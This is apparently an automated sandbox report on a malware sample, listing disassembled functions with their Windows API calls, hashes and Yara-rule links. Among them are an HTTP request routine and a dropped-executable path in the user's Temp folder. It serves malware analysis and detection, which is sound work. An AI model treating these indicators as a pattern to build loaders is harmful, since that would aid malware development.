                                                                                                                                              • Part of subcall function 02231DC9: __dosmaperr.LIBCMT ref: 02231DFE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1206951868-0
                                                                                                                                            • Opcode ID: a23d261a52b5f9b846104edee53f27537c0404e818dce516698b2e32cd5f43d1
                                                                                                                                            • Instruction ID: 056466e2acf429311ab3115004bd0d010ae41c56bdb3c7fc7e653fb89dea8aa7
                                                                                                                                            • Opcode Fuzzy Hash: a23d261a52b5f9b846104edee53f27537c0404e818dce516698b2e32cd5f43d1
                                                                                                                                            • Instruction Fuzzy Hash: 03414EB5910305AFDB25DFE9DC449EBBBFAEF49300B00852DE85AD3614E7309955CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041B6C6, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0041B6DE
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041B6F0
                                                                                                                                            • _free.LIBCMT ref: 0041B702
                                                                                                                                            • _free.LIBCMT ref: 0041B714
                                                                                                                                            • _free.LIBCMT ref: 0041B726
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 72c623a330305ed8c8d887ea2e85d0e1707ef1c6524a41b347e3d58e20e3bcd1
                                                                                                                                            • Instruction ID: a39dbec80042cf7ab2af5a54609ca5fcb94fb6c3dd62ab813c31dfe5020b408c
                                                                                                                                            • Opcode Fuzzy Hash: 72c623a330305ed8c8d887ea2e85d0e1707ef1c6524a41b347e3d58e20e3bcd1
                                                                                                                                            • Instruction Fuzzy Hash: 66F04F32600610A78620FB66F8C5DDB77E9EA84351794580BF098D7642CB38FCC186AC
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00419D93, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: *?
                                                                                                                                            • API String ID: 269201875-2564092906
                                                                                                                                            • Opcode ID: f63c959fec63c638acbb7ef9835275d00cb3544718f5775b9b35536119c19f2a
                                                                                                                                            • Instruction ID: 0e352be0efe34e277c7e4760dbf0677bf23d989de96f83cd80e8d90098d39d98
                                                                                                                                            • Opcode Fuzzy Hash: f63c959fec63c638acbb7ef9835275d00cb3544718f5775b9b35536119c19f2a
                                                                                                                                            • Instruction Fuzzy Hash: 0B615E75E00219AFCF14CFA9C8915EEFBF5EF48314B24816AE815E7340D779AE818B94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02239FE3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: *?
                                                                                                                                            • API String ID: 269201875-2564092906
                                                                                                                                            • Opcode ID: 0a53196b252b46736e61d4d1bcca109f78a400bdedf12c68fddac8ae25f72c85
                                                                                                                                            • Instruction ID: 0f95832da43a73c90672f9ef1fd92755cbb72ee2b8095fb8caec4ecca1266a53
                                                                                                                                            • Opcode Fuzzy Hash: 0a53196b252b46736e61d4d1bcca109f78a400bdedf12c68fddac8ae25f72c85
                                                                                                                                            • Instruction Fuzzy Hash: 5E613CB5E1021A9FCB15DFE8C880AEDFBF5EF48310B24816AD895E7314D775AE418B90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0222FB50, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0222FB8F
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0222FC43
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 3480331319-3733052814
                                                                                                                                            • Opcode ID: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction ID: ce1aadfd799c309c3c3b53201d6c7e6930f6ce90ce1166bb4d43d12878f3d672
                                                                                                                                            • Opcode Fuzzy Hash: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction Fuzzy Hash: F251B334A10329EFCF14DFA8C940B6E7BB5EF44314F148159E8155B6A9D772DA0ACFA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00413D50, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (5h$C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                            • API String ID: 0-871336922
                                                                                                                                            • Opcode ID: 5aa56120bd411b6f550849201c1a1e1c76fd655a24e3d97c9c994e481349dc19
                                                                                                                                            • Instruction ID: 9682771c9b056e9ecfe8b90a09f19d3fc3ff21ab17bd8dde71222bcf1ffa2253
                                                                                                                                            • Opcode Fuzzy Hash: 5aa56120bd411b6f550849201c1a1e1c76fd655a24e3d97c9c994e481349dc19
                                                                                                                                            • Instruction Fuzzy Hash: E1416E71A00314ABCB219F999C819EFBBB8EF85711F5000BBF50497251D6789B81CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02233FA0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: (5h$C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                            • API String ID: 0-871336922
                                                                                                                                            • Opcode ID: a41690f532066a8b71b9e286dfa568cd4f83670d9d2d2647161a3b7c6b7cbf70
                                                                                                                                            • Instruction ID: d1ea4bdd8fff229a1b3806d3caf4469fbbb13a695e759f795a75062f6f18e998
                                                                                                                                            • Opcode Fuzzy Hash: a41690f532066a8b71b9e286dfa568cd4f83670d9d2d2647161a3b7c6b7cbf70
                                                                                                                                            • Instruction Fuzzy Hash: 614151F1B20215AFCB27EBD9DC8099EBBB9EB85710B5400B6E40497258D7B19A45CB90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041A825, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041A5CE: GetOEMCP.KERNEL32(00000000,0041A840,00417373,00000000,?,?,00000000,?,00417373), ref: 0041A5F9
                                                                                                                                            • _free.LIBCMT ref: 0041A89D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: hdi$ssA
                                                                                                                                            • API String ID: 269201875-1583100127
                                                                                                                                            • Opcode ID: d41f6d52fbd4fd4fef80a292fe6fc41e5ec69a9ad7c14e0fcabfd5c9824dc3d7
                                                                                                                                            • Instruction ID: 8fc8c036d32de9612cf7c31c04d913b2c1a5afb910598d1080d20a8abe594b57
                                                                                                                                            • Opcode Fuzzy Hash: d41f6d52fbd4fd4fef80a292fe6fc41e5ec69a9ad7c14e0fcabfd5c9824dc3d7
                                                                                                                                            • Instruction Fuzzy Hash: F531E371900249AFDB01EF69D840BEB7BF4EF80314F11406AF91497291D77A9DA2CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00416558, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,agA), ref: 00416591
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000001,00000000,00000104,00000000,?,?,agA), ref: 004165C4
                                                                                                                                            • _free.LIBCMT ref: 004165E5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory$_free
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2913637552-2637427811
                                                                                                                                            • Opcode ID: 86f7d195622081202694a59e57fcb950501743b6379c622577fe6e62fd1502c2
                                                                                                                                            • Instruction ID: 9d0f8bc13d9cd8409b4ed1e15322f7ab0248507ce056390ebc8deae956cba42f
                                                                                                                                            • Opcode Fuzzy Hash: 86f7d195622081202694a59e57fcb950501743b6379c622577fe6e62fd1502c2
                                                                                                                                            • Instruction Fuzzy Hash: 84014C726002147BE720AB21BC89EEB77ADDB84314F52006FF504D7085DE78DEC585A9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00407120, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00407AB7
                                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00407AC6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Xinvalid_argumentstd::_
                                                                                                                                            • String ID: invalid stoi argument$stoi argument out of range
                                                                                                                                            • API String ID: 909987262-1606216832
                                                                                                                                            • Opcode ID: 7966cb39fd00ecbfbcc74c2c2a889e2096aecc4dbfdb33b72d4a727a0856f0fd
                                                                                                                                            • Instruction ID: c23342b3269767f06ddacd654a4abb89c3490b8dfdf046251d35b8837c83ab9e
                                                                                                                                            • Opcode Fuzzy Hash: 7966cb39fd00ecbfbcc74c2c2a889e2096aecc4dbfdb33b72d4a727a0856f0fd
                                                                                                                                            • Instruction Fuzzy Hash: 5BF09671904218A6DB10FBA68802BCD7FB89F00304F60001AF91433182D7B8395486F6
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004186CA, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            • Opcode ID: 6d0fcd9e8ca64aa98b8ad366b7f02e1ca44db32ecf6a2a1d0e69540dc2528efd
                                                                                                                                            • Instruction ID: 560596ec7e37f14c04316295b7cb4fd2eae0d342fd8a579eee232b68144b6b6c
                                                                                                                                            • Opcode Fuzzy Hash: 6d0fcd9e8ca64aa98b8ad366b7f02e1ca44db32ecf6a2a1d0e69540dc2528efd
                                                                                                                                            • Instruction Fuzzy Hash: 7AB10272A102459FDB119F28C8817FFBBE5EF55340F2441AFE8549B341DA3C9982CB69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02224850, Relevance: 6.3, APIs: 4, Instructions: 281COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 0222486D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 514040917-0
                                                                                                                                            • Opcode ID: 85a6ad29cf902c1d02eb17bf6ce46814bab99eca8542f3e3dba0f13802fe7aa0
                                                                                                                                            • Instruction ID: 32e161f2f0521f6cd1adb6f6a18a801ce3506c36652f3928f78835420e8dc93b
                                                                                                                                            • Opcode Fuzzy Hash: 85a6ad29cf902c1d02eb17bf6ce46814bab99eca8542f3e3dba0f13802fe7aa0
                                                                                                                                            • Instruction Fuzzy Hash: 7C91C570E10219ABDF14EFE8DC84BEEB7BAEF44304F504158E405A7244DB766A49CFA1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02226074, Relevance: 6.2, APIs: 4, Instructions: 247networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 02226083
                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,?), ref: 0222612C
                                                                                                                                            • InternetReadFile.WININET(00000000,?,000003FF,00000010), ref: 022261BD
                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000003FF,?), ref: 02226244
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileHttpInternetReadRequest$OpenSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 947651290-0
                                                                                                                                            • Opcode ID: 904cc2ce5ff8bf6cee2c7f1abe25be3c3cc71af15eff2d3c8f81a232e55ea554
                                                                                                                                            • Instruction ID: d88000f801a7b23b6bb3c9588f7195d67dbe2ea2c9c8e428a8cac820e81a9a30
                                                                                                                                            • Opcode Fuzzy Hash: 904cc2ce5ff8bf6cee2c7f1abe25be3c3cc71af15eff2d3c8f81a232e55ea554
                                                                                                                                            • Instruction Fuzzy Hash: B0812A72620124BFEB08DFA8CD84BBD7B7AEF85304F504158F810D7299D736DA888B91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0042051E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 004205EE
                                                                                                                                            • _free.LIBCMT ref: 00420617
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0041CA05,00000000,?,?,?,?,?,?,?,?,0041CA05,?,00000000), ref: 00420649
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041CA05,?,00000000,?,?,?,?,?), ref: 00420665
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            • Opcode ID: 077adc71c24facdd0bccf0414a0bc69fad9beae37cb48af6896d15f7176986e1
                                                                                                                                            • Instruction ID: 960fb58cf6f23020af512c85160b1bf2a67ab43dcb0f58da72c25fd8b3413fdb
                                                                                                                                            • Opcode Fuzzy Hash: 077adc71c24facdd0bccf0414a0bc69fad9beae37cb48af6896d15f7176986e1
                                                                                                                                            • Instruction Fuzzy Hash: 6A41F872B00215ABCB11AB6ADC46BDF3AE5EF84324F540117F514D72A3D67CD8A08B6D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0224076E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0224083E
                                                                                                                                            • _free.LIBCMT ref: 02240867
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0223CC55,00000000,022355AE,?,?,?,?,?,?,?,0223CC55,022355AE,00000000), ref: 02240899
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0223CC55,022355AE,00000000,?,?,?,?,00000000), ref: 022408B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            • Opcode ID: fe3b5957c6c2af7f62df8148c82574c5733b1df3c93794585147ec112902f231
                                                                                                                                            • Instruction ID: 8246cb88b721d6ee3f5d37c7299c25cb8040f9e9eee2cd09708b60e7b2a97c83
                                                                                                                                            • Opcode Fuzzy Hash: fe3b5957c6c2af7f62df8148c82574c5733b1df3c93794585147ec112902f231
                                                                                                                                            • Instruction Fuzzy Hash: 1B41C8B29307059BDB1EABF88D40F9E7776AF44320F550110EA14AB198EF74DA918FA1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00403EE0, Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00403F36
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            • Opcode ID: a4c7161ae34726def3c70e2fe95e2eb70a4deda401202cbc4ed871267c3eb9c6
                                                                                                                                            • Instruction ID: b5cf2b7309114b8609beb7503341a49d43379c7fc9661a5a7bf876c8a635a089
                                                                                                                                            • Opcode Fuzzy Hash: a4c7161ae34726def3c70e2fe95e2eb70a4deda401202cbc4ed871267c3eb9c6
                                                                                                                                            • Instruction Fuzzy Hash: 31312770D0021897DB20EF68DC4A7DEBB75EF41315F40427AE900732C1EB794A858BD9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00419CC4, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411547: _free.LIBCMT ref: 00411555
                                                                                                                                              • Part of subcall function 0041AC9B: WideCharToMultiByte.KERNEL32(00403AF0,00000000,0042CEB8,00000000,00403AF0,00403AF0,00417CA7,?,0042CEB8,?,00000000,?,00417A16,0000FDE9,00000000,?), ref: 0041AD3D
                                                                                                                                            • GetLastError.KERNEL32 ref: 00419D2C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00419D33
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00419D72
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00419D79
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                            • Opcode ID: 1c3af7858ea50f7c5b5e6d64a6857d60a2eae298f119b56bdb5357b17a8338d4
                                                                                                                                            • Instruction ID: 4d93f7510ca8fb492935d04f0bce4db79238aaac4d275d244a80cacbd3f4cc59
                                                                                                                                            • Opcode Fuzzy Hash: 1c3af7858ea50f7c5b5e6d64a6857d60a2eae298f119b56bdb5357b17a8338d4
                                                                                                                                            • Instruction Fuzzy Hash: 96212B712002057FDB20AF66DC809EBBBACEF44368710461EF919C7251E738ECD08BA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02239F14, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02231797: _free.LIBCMT ref: 022317A5
                                                                                                                                              • Part of subcall function 0223AEEB: WideCharToMultiByte.KERNEL32(02223D40,00000000,0042CEB8,00000000,02223D40,02223D40,02237EF7,?,0042CEB8,?,00000000,?,02237C66,0000FDE9,00000000,?), ref: 0223AF8D
                                                                                                                                            • GetLastError.KERNEL32 ref: 02239F7C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02239F83
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02239FC2
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02239FC9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                            • Opcode ID: f624358d235691ce9a0a371fa08fb7bf6c8004fea39919ec22af2019dff57810
                                                                                                                                            • Instruction ID: ae4138f9fecc4b56d559df3bf0cbbdbda8065ce33cc0bcc8d53b79f734cd8320
                                                                                                                                            • Opcode Fuzzy Hash: f624358d235691ce9a0a371fa08fb7bf6c8004fea39919ec22af2019dff57810
                                                                                                                                            • Instruction Fuzzy Hash: B121CBF1624315AF9B22AFE98C80D6BB7AEEF013647008525F958D7158DBB0EC918B50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 022362BC, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction ID: 6179c5f18ead6df4d69bc23217c58f710f46e519add7566c9ff640aa946ff8c0
                                                                                                                                            • Opcode Fuzzy Hash: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction Fuzzy Hash: 7121D8B1B61221BBCB339BA49D80B3A766CAF02F64F160160ED25AF194D770D810C5EC
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00415DB2, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00403AF0,00403AF0,C061E850,0041775D,?,00403AF0,0042CEB8,?,00417C1C,00403AF0,73B76490,00403AF0,00403AF0,00403AF0,73B76490,0040D323), ref: 00415DB7
                                                                                                                                            • _free.LIBCMT ref: 00415E14
                                                                                                                                            • _free.LIBCMT ref: 00415E4A
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,00417C1C,00403AF0,73B76490,00403AF0,00403AF0,00403AF0,73B76490,0040D323,?,00411385,0040D323,0042CEB8), ref: 00415E55
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: a821c2ecde716aeb3cb1a7330a248f4fb163069998c81411724b0173f427264f
                                                                                                                                            • Instruction ID: 21afd909f4b194fd6210441988fb04bb61b69f96b30193ecae22d5dba2614194
                                                                                                                                            • Opcode Fuzzy Hash: a821c2ecde716aeb3cb1a7330a248f4fb163069998c81411724b0173f427264f
                                                                                                                                            • Instruction Fuzzy Hash: ED11EB31700A11EA9620377A6C85EEB255587C0779776413FF538862D1ED7D8CD7412C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02236002, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,02231715,?,?,?,?,02232382,?), ref: 02236007
                                                                                                                                            • _free.LIBCMT ref: 02236064
                                                                                                                                            • _free.LIBCMT ref: 0223609A
                                                                                                                                            • SetLastError.KERNEL32(00000000,0042E0F8,000000FF,?,?,02231715,?,?,?,?,02232382,?), ref: 022360A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: ce625cf24dc58ea9de07f82b5e61b0c3359b06124770d73b9dea0357b3156acb
                                                                                                                                            • Instruction ID: f65755cb303ee9228b51fe060b4fc37b909bdf415a7aade9cef7ea2e50bf716e
                                                                                                                                            • Opcode Fuzzy Hash: ce625cf24dc58ea9de07f82b5e61b0c3359b06124770d73b9dea0357b3156acb
                                                                                                                                            • Instruction Fuzzy Hash: 3511E3B2730322BAD63367F55C85A7B256EABC13757750234E238821DCEEB28817852C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00415F09, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(0040D31C,0040D31C,E80042EF,004120CC,004159ED,?,?,0040EBD3,0040D31C,?,0040DD48,E80042F0,73B76490), ref: 00415F0E
                                                                                                                                            • _free.LIBCMT ref: 00415F6B
                                                                                                                                            • _free.LIBCMT ref: 00415FA1
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0040EBD3,0040D31C,?,0040DD48,E80042F0,73B76490), ref: 00415FAC
                                                                                                                                            Memory Dump Source
